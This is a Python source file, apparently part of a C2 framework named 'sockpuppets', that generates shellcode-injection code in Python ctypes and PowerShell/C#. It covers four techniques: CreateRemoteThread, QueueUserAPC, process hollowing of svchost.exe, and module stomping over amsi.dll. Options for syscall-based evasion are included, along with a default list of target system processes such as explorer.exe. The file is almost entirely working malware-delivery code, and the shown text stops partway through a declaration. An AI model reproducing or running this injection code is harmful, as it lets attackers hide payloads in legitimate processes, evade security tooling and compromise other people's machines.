"""Process injection code generation for sockpuppets C2.

Generates Python (ctypes) and PowerShell (inline C#) code for four injection
techniques: CreateRemoteThread, QueueUserAPC, Process Hollowing, Module Stomping.

All memory/thread operations route through syscall wrappers (evasion.syscalls)
when config.syscalls is set; otherwise they fall back to direct Win32 API calls
via ctypes.windll.kernel32.
"""

from __future__ import annotations

from typing import TYPE_CHECKING

if TYPE_CHECKING:
    from evasion import EvasionConfig


# ---------------------------------------------------------------------------
# Default target processes, ordered by preference
# ---------------------------------------------------------------------------
_DEFAULT_TARGETS = [
    "RuntimeBroker.exe",
    "smartscreen.exe",
    "SearchHost.exe",
    "explorer.exe",
]


# ===================================================================
# Public entry point (called by evasion.__init__.get_evasion_code)
# ===================================================================

def generate_code(lang: str, config: EvasionConfig) -> str:
    """Return injection code for *lang* configured by *config*.

    Returns an empty string for unsupported languages (javascript, vbscript).
    """
    lang = lang.lower()
    if lang == "python":
        return _generate_python(config)
    if lang == "powershell":
        return _generate_powershell(config)
    return ""


# ===================================================================
# Python code generation (ctypes)
# ===================================================================

def _generate_python(config: EvasionConfig) -> str:
    technique = config.inject or "createthread"
    use_syscalls = config.syscalls is not None
    target = config.inject_target
    target_list = _DEFAULT_TARGETS

    parts: list[str] = []

    # ---- Platform guard + imports ----
    parts.append(_py_header(use_syscalls))

    # ---- Constants ----
    parts.append(_py_constants())

    # ---- PROCESSENTRY32 + target finder ----
    parts.append(_py_find_target(target, target_list))

    # ---- API routing helpers ----
    parts.append(_py_api_routing(use_syscalls))

    # ---- Technique-specific code ----
    if technique == "createthread":
        parts.append(_py_createthread())
    elif technique == "apc":
        parts.append(_py_apc())
    elif technique == "hollowing":
        parts.append(_py_hollowing())
    elif technique == "stomp":
        parts.append(_py_stomp())
    else:
        parts.append(_py_createthread())

    # ---- Public inject_shellcode wrapper ----
    parts.append(_py_inject_shellcode(technique))

    return "\n".join(parts)


# -- Python: header --------------------------------------------------------

def _py_header(use_syscalls: bool) -> str:
    lines = [
        "import sys",
        "import ctypes",
        "import ctypes.wintypes as wintypes",
        "import struct",
        "",
    ]
    if use_syscalls:
        lines += [
            "# Syscall wrappers (generated by evasion.syscalls)",
            "# Expected symbols: syscall_alloc, syscall_protect, syscall_write,",
            "#   syscall_create_thread, syscall_open_process, syscall_queue_apc,",
            "#   syscall_set_context, syscall_resume_thread, syscall_unmap_section",
            "",
        ]
    return "\n".join(lines)


# -- Python: constants -----------------------------------------------------

def _py_constants() -> str:
    return (
        "PROCESS_ALL_ACCESS = 0x001FFFFF\n"
        "MEM_COMMIT = 0x00001000\n"
        "MEM_RESERVE = 0x00002000\n"
        "PAGE_READWRITE = 0x04\n"
        "PAGE_EXECUTE_READ = 0x20\n"
        "PAGE_EXECUTE_READWRITE = 0x40\n"
        "CREATE_SUSPENDED = 0x00000004\n"
        "DONT_RESOLVE_DLL_REFERENCES = 0x00000001\n"
        "TH32CS_SNAPPROCESS = 0x00000002\n"
        "TH32CS_SNAPTHREAD = 0x00000004\n"
        "THREAD_SET_CONTEXT = 0x0010\n"
        "THREAD_GET_CONTEXT = 0x0008\n"
        "THREAD_SUSPEND_RESUME = 0x0002\n"
        "CONTEXT_FULL = 0x10001F\n"
        "INFINITE = 0xFFFFFFFF\n"
        "\n"
    )


# -- Python: PROCESSENTRY32 + find_target_process --------------------------

def _py_find_target(explicit_target: str | None, defaults: list[str]) -> str:
    targets_repr = repr(defaults)
    explicit_line = ""
    if explicit_target:
        explicit_line = f'    target_name = "{explicit_target}"\n'

    return (
        "class PROCESSENTRY32(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("dwSize", ctypes.c_ulong),\n'
        '        ("cntUsage", ctypes.c_ulong),\n'
        '        ("th32ProcessID", ctypes.c_ulong),\n'
        '        ("th32DefaultHeapID", ctypes.POINTER(ctypes.c_ulong)),\n'
        '        ("th32ModuleID", ctypes.c_ulong),\n'
        '        ("cntThreads", ctypes.c_ulong),\n'
        '        ("th32ParentProcessID", ctypes.c_ulong),\n'
        '        ("pcPriClassBase", ctypes.c_long),\n'
        '        ("dwFlags", ctypes.c_ulong),\n'
        '        ("szExeFile", ctypes.c_char * 260),\n'
        "    ]\n"
        "\n"
        "\n"
        "class THREADENTRY32(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("dwSize", ctypes.c_ulong),\n'
        '        ("cntUsage", ctypes.c_ulong),\n'
        '        ("th32ThreadID", ctypes.c_ulong),\n'
        '        ("th32OwnerProcessID", ctypes.c_ulong),\n'
        '        ("tpBasePri", ctypes.c_long),\n'
        '        ("tpDeltaPri", ctypes.c_long),\n'
        '        ("dwFlags", ctypes.c_ulong),\n'
        "    ]\n"
        "\n"
        "\n"
        "def find_target_process():\n"
        f"{explicit_line}"
        f"    target_list = {targets_repr}\n"
        "    kernel32 = ctypes.windll.kernel32\n"
        "    snapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n"
        "    if snapshot == -1:\n"
        "        return None\n"
        "    try:\n"
        "        entry = PROCESSENTRY32()\n"
        "        entry.dwSize = ctypes.sizeof(PROCESSENTRY32)\n"
        "        if not kernel32.Process32First(snapshot, ctypes.byref(entry)):\n"
        "            return None\n"
        "        while True:\n"
        '            proc_name = entry.szExeFile.decode("utf-8", errors="ignore").strip("\\x00")\n'
        + (
            "            if proc_name.lower() == target_name.lower():\n"
            "                return entry.th32ProcessID\n"
            if explicit_target
            else
            "            for target_name in target_list:\n"
            "                if proc_name.lower() == target_name.lower():\n"
            "                    return entry.th32ProcessID\n"
        )
        + "            if not kernel32.Process32Next(snapshot, ctypes.byref(entry)):\n"
        "                break\n"
        "    except Exception:\n"
        "        pass\n"
        "    finally:\n"
        "        kernel32.CloseHandle(snapshot)\n"
        "    return None\n"
        "\n"
    )


# -- Python: API routing ---------------------------------------------------

def _py_api_routing(use_syscalls: bool) -> str:
    if use_syscalls:
        return (
            "def api_open_process(access, inherit, pid):\n"
            "    return syscall_open_process(access, inherit, pid)\n"
            "\n"
            "def api_alloc(handle, size, alloc_type=MEM_COMMIT | MEM_RESERVE, protect=PAGE_READWRITE):\n"
            "    return syscall_alloc(handle, size, alloc_type, protect)\n"
            "\n"
            "def api_write(handle, base_addr, buffer, size):\n"
            "    return syscall_write(handle, base_addr, buffer, size)\n"
            "\n"
            "def api_protect(handle, addr, size, new_protect):\n"
            "    return syscall_protect(handle, addr, size, new_protect)\n"
            "\n"
            "def api_create_thread(handle, start_addr, param=0):\n"
            "    return syscall_create_thread(handle, start_addr, param)\n"
            "\n"
            "def api_queue_apc(thread_handle, apc_routine, param=0):\n"
            "    return syscall_queue_apc(thread_handle, apc_routine, param)\n"
            "\n"
            "def api_unmap_section(handle, base_addr):\n"
            "    return syscall_unmap_section(handle, base_addr)\n"
            "\n"
            "def api_set_context(thread_handle, context):\n"
            "    return syscall_set_context(thread_handle, context)\n"
            "\n"
            "def api_resume_thread(thread_handle):\n"
            "    return syscall_resume_thread(thread_handle)\n"
            "\n"
        )
    return (
        "kernel32 = ctypes.windll.kernel32\n"
        "ntdll = ctypes.windll.ntdll\n"
        "\n"
        "def api_open_process(access, inherit, pid):\n"
        "    handle = kernel32.OpenProcess(access, inherit, pid)\n"
        "    return handle\n"
        "\n"
        "def api_alloc(handle, size, alloc_type=MEM_COMMIT | MEM_RESERVE, protect=PAGE_READWRITE):\n"
        "    addr = kernel32.VirtualAllocEx(handle, None, size, alloc_type, protect)\n"
        "    return addr\n"
        "\n"
        "def api_write(handle, base_addr, buffer, size):\n"
        "    written = ctypes.c_size_t(0)\n"
        "    result = kernel32.WriteProcessMemory(handle, base_addr, buffer, size, ctypes.byref(written))\n"
        "    return result\n"
        "\n"
        "def api_protect(handle, addr, size, new_protect):\n"
        "    old_protect = ctypes.c_ulong(0)\n"
        "    result = kernel32.VirtualProtectEx(handle, addr, size, new_protect, ctypes.byref(old_protect))\n"
        "    return result\n"
        "\n"
        "def api_create_thread(handle, start_addr, param=0):\n"
        "    thread_id = ctypes.c_ulong(0)\n"
        "    thread_handle = kernel32.CreateRemoteThread(\n"
        "        handle, None, 0, start_addr, param, 0, ctypes.byref(thread_id)\n"
        "    )\n"
        "    return thread_handle\n"
        "\n"
        "def api_queue_apc(thread_handle, apc_routine, param=0):\n"
        "    return kernel32.QueueUserAPC(apc_routine, thread_handle, param)\n"
        "\n"
        "def api_unmap_section(handle, base_addr):\n"
        "    base = ctypes.c_void_p(base_addr)\n"
        "    return ntdll.NtUnmapViewOfSection(handle, base)\n"
        "\n"
        "def api_set_context(thread_handle, context):\n"
        "    return kernel32.SetThreadContext(thread_handle, ctypes.byref(context))\n"
        "\n"
        "def api_resume_thread(thread_handle):\n"
        "    return kernel32.ResumeThread(thread_handle)\n"
        "\n"
    )


# -- Python: CreateRemoteThread technique ----------------------------------

def _py_createthread() -> str:
    return (
        "def inject_createthread(shellcode, pid):\n"
        "    try:\n"
        "        process_handle = api_open_process(PROCESS_ALL_ACCESS, False, pid)\n"
        "        if not process_handle:\n"
        "            return False\n"
        "        sc_len = len(shellcode)\n"
        "        remote_addr = api_alloc(process_handle, sc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)\n"
        "        if not remote_addr:\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        sc_buf = ctypes.create_string_buffer(shellcode)\n"
        "        if not api_write(process_handle, remote_addr, sc_buf, sc_len):\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        if not api_protect(process_handle, remote_addr, sc_len, PAGE_EXECUTE_READ):\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        thread_handle = api_create_thread(process_handle, remote_addr)\n"
        "        if not thread_handle:\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        kernel32.WaitForSingleObject(thread_handle, INFINITE)\n"
        "        kernel32.CloseHandle(thread_handle)\n"
        "        kernel32.CloseHandle(process_handle)\n"
        "        return True\n"
        "    except Exception:\n"
        "        return False\n"
        "\n"
    )


# -- Python: QueueUserAPC technique ----------------------------------------

def _py_apc() -> str:
    return (
        "def enumerate_threads(pid):\n"
        "    thread_ids = []\n"
        "    snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0)\n"
        "    if snapshot == -1:\n"
        "        return thread_ids\n"
        "    try:\n"
        "        te = THREADENTRY32()\n"
        "        te.dwSize = ctypes.sizeof(THREADENTRY32)\n"
        "        if not ctypes.windll.kernel32.Thread32First(snapshot, ctypes.byref(te)):\n"
        "            return thread_ids\n"
        "        while True:\n"
        "            if te.th32OwnerProcessID == pid:\n"
        "                thread_ids.append(te.th32ThreadID)\n"
        "            if not ctypes.windll.kernel32.Thread32Next(snapshot, ctypes.byref(te)):\n"
        "                break\n"
        "    except Exception:\n"
        "        pass\n"
        "    finally:\n"
        "        ctypes.windll.kernel32.CloseHandle(snapshot)\n"
        "    return thread_ids\n"
        "\n"
        "\n"
        "def inject_apc(shellcode, pid):\n"
        "    try:\n"
        "        process_handle = api_open_process(PROCESS_ALL_ACCESS, False, pid)\n"
        "        if not process_handle:\n"
        "            return False\n"
        "        sc_len = len(shellcode)\n"
        "        remote_addr = api_alloc(process_handle, sc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)\n"
        "        if not remote_addr:\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        sc_buf = ctypes.create_string_buffer(shellcode)\n"
        "        if not api_write(process_handle, remote_addr, sc_buf, sc_len):\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        if not api_protect(process_handle, remote_addr, sc_len, PAGE_EXECUTE_READ):\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        thread_ids = enumerate_threads(pid)\n"
        "        if not thread_ids:\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            return False\n"
        "        queued = False\n"
        "        for tid in thread_ids:\n"
        "            thread_handle = ctypes.windll.kernel32.OpenThread(\n"
        "                THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME, False, tid\n"
        "            )\n"
        "            if thread_handle:\n"
        "                if api_queue_apc(thread_handle, remote_addr):\n"
        "                    queued = True\n"
        "                ctypes.windll.kernel32.CloseHandle(thread_handle)\n"
        "        kernel32.CloseHandle(process_handle)\n"
        "        return queued\n"
        "    except Exception:\n"
        "        return False\n"
        "\n"
    )


# -- Python: Process Hollowing technique ------------------------------------

def _py_hollowing() -> str:
    return (
        "class STARTUPINFO(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("cb", ctypes.c_ulong),\n'
        '        ("lpReserved", ctypes.c_wchar_p),\n'
        '        ("lpDesktop", ctypes.c_wchar_p),\n'
        '        ("lpTitle", ctypes.c_wchar_p),\n'
        '        ("dwX", ctypes.c_ulong),\n'
        '        ("dwY", ctypes.c_ulong),\n'
        '        ("dwXSize", ctypes.c_ulong),\n'
        '        ("dwYSize", ctypes.c_ulong),\n'
        '        ("dwXCountChars", ctypes.c_ulong),\n'
        '        ("dwYCountChars", ctypes.c_ulong),\n'
        '        ("dwFillAttribute", ctypes.c_ulong),\n'
        '        ("dwFlags", ctypes.c_ulong),\n'
        '        ("wShowWindow", ctypes.c_ushort),\n'
        '        ("cbReserved2", ctypes.c_ushort),\n'
        '        ("lpReserved2", ctypes.POINTER(ctypes.c_ubyte)),\n'
        '        ("hStdInput", ctypes.c_void_p),\n'
        '        ("hStdOutput", ctypes.c_void_p),\n'
        '        ("hStdError", ctypes.c_void_p),\n'
        "    ]\n"
        "\n"
        "\n"
        "class PROCESS_INFORMATION(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("hProcess", ctypes.c_void_p),\n'
        '        ("hThread", ctypes.c_void_p),\n'
        '        ("dwProcessId", ctypes.c_ulong),\n'
        '        ("dwThreadId", ctypes.c_ulong),\n'
        "    ]\n"
        "\n"
        "\n"
        "class CONTEXT64(ctypes.Structure):\n"
        "    _pack_ = 16\n"
        "    _fields_ = [\n"
        '        ("P1Home", ctypes.c_ulonglong),\n'
        '        ("P2Home", ctypes.c_ulonglong),\n'
        '        ("P3Home", ctypes.c_ulonglong),\n'
        '        ("P4Home", ctypes.c_ulonglong),\n'
        '        ("P5Home", ctypes.c_ulonglong),\n'
        '        ("P6Home", ctypes.c_ulonglong),\n'
        '        ("ContextFlags", ctypes.c_ulong),\n'
        '        ("MxCsr", ctypes.c_ulong),\n'
        '        ("SegCs", ctypes.c_ushort),\n'
        '        ("SegDs", ctypes.c_ushort),\n'
        '        ("SegEs", ctypes.c_ushort),\n'
        '        ("SegFs", ctypes.c_ushort),\n'
        '        ("SegGs", ctypes.c_ushort),\n'
        '        ("SegSs", ctypes.c_ushort),\n'
        '        ("EFlags", ctypes.c_ulong),\n'
        '        ("Dr0", ctypes.c_ulonglong),\n'
        '        ("Dr1", ctypes.c_ulonglong),\n'
        '        ("Dr2", ctypes.c_ulonglong),\n'
        '        ("Dr3", ctypes.c_ulonglong),\n'
        '        ("Dr6", ctypes.c_ulonglong),\n'
        '        ("Dr7", ctypes.c_ulonglong),\n'
        '        ("Rax", ctypes.c_ulonglong),\n'
        '        ("Rcx", ctypes.c_ulonglong),\n'
        '        ("Rdx", ctypes.c_ulonglong),\n'
        '        ("Rbx", ctypes.c_ulonglong),\n'
        '        ("Rsp", ctypes.c_ulonglong),\n'
        '        ("Rbp", ctypes.c_ulonglong),\n'
        '        ("Rsi", ctypes.c_ulonglong),\n'
        '        ("Rdi", ctypes.c_ulonglong),\n'
        '        ("R8", ctypes.c_ulonglong),\n'
        '        ("R9", ctypes.c_ulonglong),\n'
        '        ("R10", ctypes.c_ulonglong),\n'
        '        ("R11", ctypes.c_ulonglong),\n'
        '        ("R12", ctypes.c_ulonglong),\n'
        '        ("R13", ctypes.c_ulonglong),\n'
        '        ("R14", ctypes.c_ulonglong),\n'
        '        ("R15", ctypes.c_ulonglong),\n'
        '        ("Rip", ctypes.c_ulonglong),\n'
        "    ]\n"
        "\n"
        "\n"
        "def inject_hollowing(shellcode, target_exe=None):\n"
        "    try:\n"
        '        if target_exe is None:\n'
        '            target_exe = r"C:\\Windows\\System32\\svchost.exe"\n'
        "        si = STARTUPINFO()\n"
        "        si.cb = ctypes.sizeof(STARTUPINFO)\n"
        "        pi = PROCESS_INFORMATION()\n"
        "        result = ctypes.windll.kernel32.CreateProcessW(\n"
        "            target_exe, None, None, None, False,\n"
        "            CREATE_SUSPENDED, None, None,\n"
        "            ctypes.byref(si), ctypes.byref(pi)\n"
        "        )\n"
        "        if not result:\n"
        "            return False\n"
        "        ctx = CONTEXT64()\n"
        "        ctx.ContextFlags = CONTEXT_FULL\n"
        "        if not ctypes.windll.kernel32.GetThreadContext(pi.hThread, ctypes.byref(ctx)):\n"
        "            ctypes.windll.kernel32.TerminateProcess(pi.hProcess, 1)\n"
        "            return False\n"
        "        image_base_addr = ctx.Rdx + 0x10\n"
        "        image_base_buf = ctypes.c_ulonglong(0)\n"
        "        bytes_read = ctypes.c_size_t(0)\n"
        "        ctypes.windll.kernel32.ReadProcessMemory(\n"
        "            pi.hProcess, image_base_addr, ctypes.byref(image_base_buf),\n"
        "            ctypes.sizeof(image_base_buf), ctypes.byref(bytes_read)\n"
        "        )\n"
        "        api_unmap_section(pi.hProcess, image_base_buf.value)\n"
        "        sc_len = len(shellcode)\n"
        "        alloc_size = max(sc_len, 0x1000)\n"
        "        remote_addr = api_alloc(\n"
        "            pi.hProcess, alloc_size,\n"
        "            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE\n"
        "        )\n"
        "        if not remote_addr:\n"
        "            ctypes.windll.kernel32.TerminateProcess(pi.hProcess, 1)\n"
        "            return False\n"
        "        sc_buf = ctypes.create_string_buffer(shellcode)\n"
        "        if not api_write(pi.hProcess, remote_addr, sc_buf, sc_len):\n"
        "            ctypes.windll.kernel32.TerminateProcess(pi.hProcess, 1)\n"
        "            return False\n"
        "        ctx.Rcx = remote_addr\n"
        "        if not api_set_context(pi.hThread, ctx):\n"
        "            ctypes.windll.kernel32.TerminateProcess(pi.hProcess, 1)\n"
        "            return False\n"
        "        api_resume_thread(pi.hThread)\n"
        "        ctypes.windll.kernel32.CloseHandle(pi.hThread)\n"
        "        ctypes.windll.kernel32.CloseHandle(pi.hProcess)\n"
        "        return True\n"
        "    except Exception:\n"
        "        return False\n"
        "\n"
    )


# -- Python: Module Stomping technique --------------------------------------

def _py_stomp() -> str:
    return (
        "class IMAGE_DOS_HEADER(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("e_magic", ctypes.c_ushort),\n'
        '        ("e_cblp", ctypes.c_ushort),\n'
        '        ("e_cp", ctypes.c_ushort),\n'
        '        ("e_crlc", ctypes.c_ushort),\n'
        '        ("e_cparhdr", ctypes.c_ushort),\n'
        '        ("e_minalloc", ctypes.c_ushort),\n'
        '        ("e_maxalloc", ctypes.c_ushort),\n'
        '        ("e_ss", ctypes.c_ushort),\n'
        '        ("e_sp", ctypes.c_ushort),\n'
        '        ("e_csum", ctypes.c_ushort),\n'
        '        ("e_ip", ctypes.c_ushort),\n'
        '        ("e_cs", ctypes.c_ushort),\n'
        '        ("e_lfarlc", ctypes.c_ushort),\n'
        '        ("e_ovno", ctypes.c_ushort),\n'
        '        ("e_res", ctypes.c_ushort * 4),\n'
        '        ("e_oemid", ctypes.c_ushort),\n'
        '        ("e_oeminfo", ctypes.c_ushort),\n'
        '        ("e_res2", ctypes.c_ushort * 10),\n'
        '        ("e_lfanew", ctypes.c_long),\n'
        "    ]\n"
        "\n"
        "\n"
        "class IMAGE_FILE_HEADER(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("Machine", ctypes.c_ushort),\n'
        '        ("NumberOfSections", ctypes.c_ushort),\n'
        '        ("TimeDateStamp", ctypes.c_ulong),\n'
        '        ("PointerToSymbolTable", ctypes.c_ulong),\n'
        '        ("NumberOfSymbols", ctypes.c_ulong),\n'
        '        ("SizeOfOptionalHeader", ctypes.c_ushort),\n'
        '        ("Characteristics", ctypes.c_ushort),\n'
        "    ]\n"
        "\n"
        "\n"
        "class IMAGE_SECTION_HEADER(ctypes.Structure):\n"
        "    _fields_ = [\n"
        '        ("Name", ctypes.c_char * 8),\n'
        '        ("VirtualSize", ctypes.c_ulong),\n'
        '        ("VirtualAddress", ctypes.c_ulong),\n'
        '        ("SizeOfRawData", ctypes.c_ulong),\n'
        '        ("PointerToRawData", ctypes.c_ulong),\n'
        '        ("PointerToRelocations", ctypes.c_ulong),\n'
        '        ("PointerToLinenumbers", ctypes.c_ulong),\n'
        '        ("NumberOfRelocations", ctypes.c_ushort),\n'
        '        ("NumberOfLinenumbers", ctypes.c_ushort),\n'
        '        ("Characteristics", ctypes.c_ulong),\n'
        "    ]\n"
        "\n"
        "\n"
        "def find_text_section(dll_handle):\n"
        "    try:\n"
        "        base = dll_handle\n"
        "        dos_header = IMAGE_DOS_HEADER.from_address(base)\n"
        "        if dos_header.e_magic != 0x5A4D:\n"
        "            return None, 0\n"
        "        pe_offset = base + dos_header.e_lfanew\n"
        "        pe_sig = ctypes.c_ulong.from_address(pe_offset).value\n"
        "        if pe_sig != 0x00004550:\n"
        "            return None, 0\n"
        "        file_header = IMAGE_FILE_HEADER.from_address(pe_offset + 4)\n"
        "        optional_header_offset = pe_offset + 4 + ctypes.sizeof(IMAGE_FILE_HEADER)\n"
        "        section_offset = optional_header_offset + file_header.SizeOfOptionalHeader\n"
        "        for i in range(file_header.NumberOfSections):\n"
        "            section = IMAGE_SECTION_HEADER.from_address(\n"
        "                section_offset + i * ctypes.sizeof(IMAGE_SECTION_HEADER)\n"
        "            )\n"
        '            name = section.Name.rstrip(b"\\x00")\n'
        '            if name == b".text":\n'
        "                text_addr = base + section.VirtualAddress\n"
        "                text_size = section.VirtualSize\n"
        "                return text_addr, text_size\n"
        "        return None, 0\n"
        "    except Exception:\n"
        "        return None, 0\n"
        "\n"
        "\n"
        "def inject_stomp(shellcode, pid):\n"
        "    try:\n"
        '        stomp_dll = r"C:\\Windows\\System32\\amsi.dll"\n'
        "        dll_handle = ctypes.windll.kernel32.LoadLibraryExA(\n"
        "            stomp_dll.encode(), None, DONT_RESOLVE_DLL_REFERENCES\n"
        "        )\n"
        "        if not dll_handle:\n"
        "            return False\n"
        "        text_addr, text_size = find_text_section(dll_handle)\n"
        "        if text_addr is None or text_size == 0:\n"
        "            ctypes.windll.kernel32.FreeLibrary(dll_handle)\n"
        "            return False\n"
        "        sc_len = len(shellcode)\n"
        "        if sc_len > text_size:\n"
        "            ctypes.windll.kernel32.FreeLibrary(dll_handle)\n"
        "            return False\n"
        "        process_handle = api_open_process(PROCESS_ALL_ACCESS, False, pid)\n"
        "        if not process_handle:\n"
        "            ctypes.windll.kernel32.FreeLibrary(dll_handle)\n"
        "            return False\n"
        "        old_protect = ctypes.c_ulong(0)\n"
        "        ctypes.windll.kernel32.VirtualProtect(\n"
        "            text_addr, sc_len, PAGE_EXECUTE_READWRITE, ctypes.byref(old_protect)\n"
        "        )\n"
        "        sc_buf = ctypes.create_string_buffer(shellcode)\n"
        "        if not api_write(process_handle, text_addr, sc_buf, sc_len):\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            ctypes.windll.kernel32.FreeLibrary(dll_handle)\n"
        "            return False\n"
        "        thread_handle = api_create_thread(process_handle, text_addr)\n"
        "        if not thread_handle:\n"
        "            kernel32.CloseHandle(process_handle)\n"
        "            ctypes.windll.kernel32.FreeLibrary(dll_handle)\n"
        "            return False\n"
        "        kernel32.WaitForSingleObject(thread_handle, INFINITE)\n"
        "        kernel32.CloseHandle(thread_handle)\n"
        "        kernel32.CloseHandle(process_handle)\n"
        "        return True\n"
        "    except Exception:\n"
        "        return False\n"
        "\n"
    )


# -- Python: inject_shellcode wrapper --------------------------------------

def _py_inject_shellcode(technique: str) -> str:
    dispatch = {
        "createthread": "inject_createthread",
        "apc": "inject_apc",
        "hollowing": "inject_hollowing",
        "stomp": "inject_stomp",
    }
    func_name = dispatch.get(technique, "inject_createthread")

    # hollowing does not need a target PID (it spawns its own process)
    if technique == "hollowing":
        return (
            "def inject_shellcode(shellcode):\n"
            "    if sys.platform != 'win32':\n"
            "        return False\n"
            "    try:\n"
            f"        return {func_name}(shellcode)\n"
            "    except Exception:\n"
            "        return False\n"
        )

    return (
        "def inject_shellcode(shellcode):\n"
        "    if sys.platform != 'win32':\n"
        "        return False\n"
        "    try:\n"
        "        pid = find_target_process()\n"
        "        if pid is None:\n"
        "            return False\n"
        f"        return {func_name}(shellcode, pid)\n"
        "    except Exception:\n"
        "        return False\n"
    )


# ===================================================================
# PowerShell code generation (inline C# via Add-Type)
# ===================================================================

def _generate_powershell(config: EvasionConfig) -> str:
    technique = config.inject or "createthread"
    use_syscalls = config.syscalls is not None
    target = config.inject_target
    target_list = _DEFAULT_TARGETS

    parts: list[str] = []
    parts.append(_ps_csharp_block(technique, use_syscalls, target, target_list))
    parts.append(_ps_wrapper(technique))
    return "\n".join(parts)


def _ps_csharp_block(
    technique: str,
    use_syscalls: bool,
    explicit_target: str | None,
    defaults: list[str],
) -> str:
    target_array = ", ".join(f'"{t}"' for t in defaults)
    target_init = (
        f'private static string specificTarget = "{explicit_target}";'
        if explicit_target
        else "private static string specificTarget = null;"
    )
    find_target_match = (
        "if (pe.szExeFile.Equals(specificTarget, StringComparison.OrdinalIgnoreCase)) return pe.th32ProcessID;"
        if explicit_target
        else (
            "foreach (string t in defaultTargets) {\n"
            "                        if (pe.szExeFile.Equals(t, StringComparison.OrdinalIgnoreCase)) return pe.th32ProcessID;\n"
            "                    }"
        )
    )

    # Build the API call routing -- either syscall-based or P/Invoke
    api_imports = _ps_pinvoke_imports(use_syscalls)

    # Build technique method
    technique_method = _ps_technique_method(technique)

    return (
        "$InjectionSource = @\"\n"
        "using System;\n"
        "using System.Runtime.InteropServices;\n"
        "using System.Diagnostics;\n"
        "\n"
        "public class ProcessInjector {\n"
        "\n"
        f"    private static string[] defaultTargets = new string[] {{ {target_array} }};\n"
        f"    {target_init}\n"
        "\n"
        "    private const uint PROCESS_ALL_ACCESS = 0x001FFFFF;\n"
        "    private const uint MEM_COMMIT = 0x00001000;\n"
        "    private const uint MEM_RESERVE = 0x00002000;\n"
        "    private const uint PAGE_READWRITE = 0x04;\n"
        "    private const uint PAGE_EXECUTE_READ = 0x20;\n"
        "    private const uint PAGE_EXECUTE_READWRITE = 0x40;\n"
        "    private const uint CREATE_SUSPENDED = 0x00000004;\n"
        "    private const uint DONT_RESOLVE_DLL_REFERENCES = 0x00000001;\n"
        "    private const uint TH32CS_SNAPPROCESS = 0x00000002;\n"
        "    private const uint TH32CS_SNAPTHREAD = 0x00000004;\n"
        "    private const uint THREAD_SET_CONTEXT = 0x0010;\n"
        "    private const uint THREAD_SUSPEND_RESUME = 0x0002;\n"
        "    private const uint CONTEXT_FULL = 0x10001F;\n"
        "    private const uint INFINITE = 0xFFFFFFFF;\n"
        "\n"
        "    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]\n"
        "    public struct PROCESSENTRY32 {\n"
        "        public uint dwSize;\n"
        "        public uint cntUsage;\n"
        "        public uint th32ProcessID;\n"
        "        public IntPtr th32DefaultHeapID;\n"
        "        public uint th32ModuleID;\n"
        "        public uint cntThreads;\n"
        "        public uint th32ParentProcessID;\n"
        "        public int pcPriClassBase;\n"
        "        public uint dwFlags;\n"
        "        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)]\n"
        "        public string szExeFile;\n"
        "    }\n"
        "\n"
        "    [StructLayout(LayoutKind.Sequential)]\n"
        "    public struct THREADENTRY32 {\n"
        "        public uint dwSize;\n"
        "        public uint cntUsage;\n"
        "        public uint th32ThreadID;\n"
        "        public uint th32OwnerProcessID;\n"
        "        public int tpBasePri;\n"
        "        public int tpDeltaPri;\n"
        "        public uint dwFlags;\n"
        "    }\n"
        "\n"
        + api_imports
        + "\n"
        "    public static int FindTargetProcess() {\n"
        "        IntPtr snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
        "        if (snap == IntPtr.Zero) return -1;\n"
        "        try {\n"
        "            PROCESSENTRY32 pe = new PROCESSENTRY32();\n"
        "            pe.dwSize = (uint)Marshal.SizeOf(typeof(PROCESSENTRY32));\n"
        "            if (!Process32First(snap, ref pe)) return -1;\n"
        "            do {\n"
        f"                    {find_target_match}\n"
        "            } while (Process32Next(snap, ref pe));\n"
        "        } finally {\n"
        "            CloseHandle(snap);\n"
        "        }\n"
        "        return -1;\n"
        "    }\n"
        "\n"
        + technique_method
        + "\n"
        "}\n"
        "\"@\n"
        "\n"
        "Add-Type -TypeDefinition $InjectionSource -Language CSharp\n"
        "\n"
    )


def _ps_pinvoke_imports(use_syscalls: bool) -> str:
    """Generate P/Invoke declarations for the C# injection class."""
    # Even when syscalls are used, we still need P/Invoke for snapshot/process
    # enumeration APIs that are not in the syscall wrapper set.
    return (
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern IntPtr CreateToolhelp32Snapshot(uint dwFlags, uint th32ProcessID);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool Process32First(IntPtr hSnapshot, ref PROCESSENTRY32 lppe);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool Process32Next(IntPtr hSnapshot, ref PROCESSENTRY32 lppe);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool Thread32First(IntPtr hSnapshot, ref THREADENTRY32 lpte);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
